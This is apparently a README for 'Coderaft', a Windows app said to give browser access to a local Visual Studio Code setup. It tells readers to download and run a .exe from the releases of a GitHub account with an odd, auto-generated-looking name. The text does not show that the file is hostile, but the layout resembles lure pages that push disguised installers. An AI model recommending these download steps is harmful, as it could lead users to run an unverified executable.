📖 About this software
Coderaft allows you to reach your Visual Studio Code environment from any web browser. You install the software on your host computer, and it creates a direct connection to your files and settings. This removes the need to sit at a specific desk to complete your work. You gain freedom to move between devices while keeping your workspace consistent.
The software functions as a lightweight server. It manages the communication between your browser and your local files. Because the package size remains small at 25MB, you can install it quickly without taxing your system storage.
⚙️ System requirements
Ensure your computer meets these conditions before you begin:
- Operating System: Windows 10 or Windows 11.
- Memory: At least 4GB of RAM.
- Storage: 100MB of free disk space.
- Internet Connection: A stable connection for remote access.
- Web Browser: A modern browser like Chrome, Edge, or Firefox.
📥 Installing the application
Follow these steps to set up the software on your Windows computer.
- Visit the following link to locate the project files: https://github.com/vitreous-racialsegregation8665/coderaft.
- Look for the Releases section on the right side of the page.
- Choose the latest version available for Windows.
- Select the file ending in .exe to start your download.
- Once the download finishes, locate the file in your Downloads folder.
- Double-click the file to start the installer.
- Follow the prompts on the screen to finish the installation process.
🚀 Running your environment
After you install the program, you must start the service to gain access.
- Open the Start menu on Windows.
- Search for "Coderaft" in the list of installed programs.
- Click the icon to launch the application.
- A small window will appear. This window shows the status of your connection.
- Locate the URL displayed in the program window, such as http://localhost:8080.
- Open your preferred web browser.
- Type that URL into the address bar and press Enter.
Your familiar coding screen will load inside the browser window. You can interact with your files exactly as you do on your desktop.
🛡️ Security considerations
Remote access requires care. Always use a strong password if the application requests one. Do not share your access URL with anyone you do not trust. Because this tool connects your browser to your local files, keeping your device and network secure remains a priority. Close the Coderaft window on your host machine when you finish your work to disable remote access.
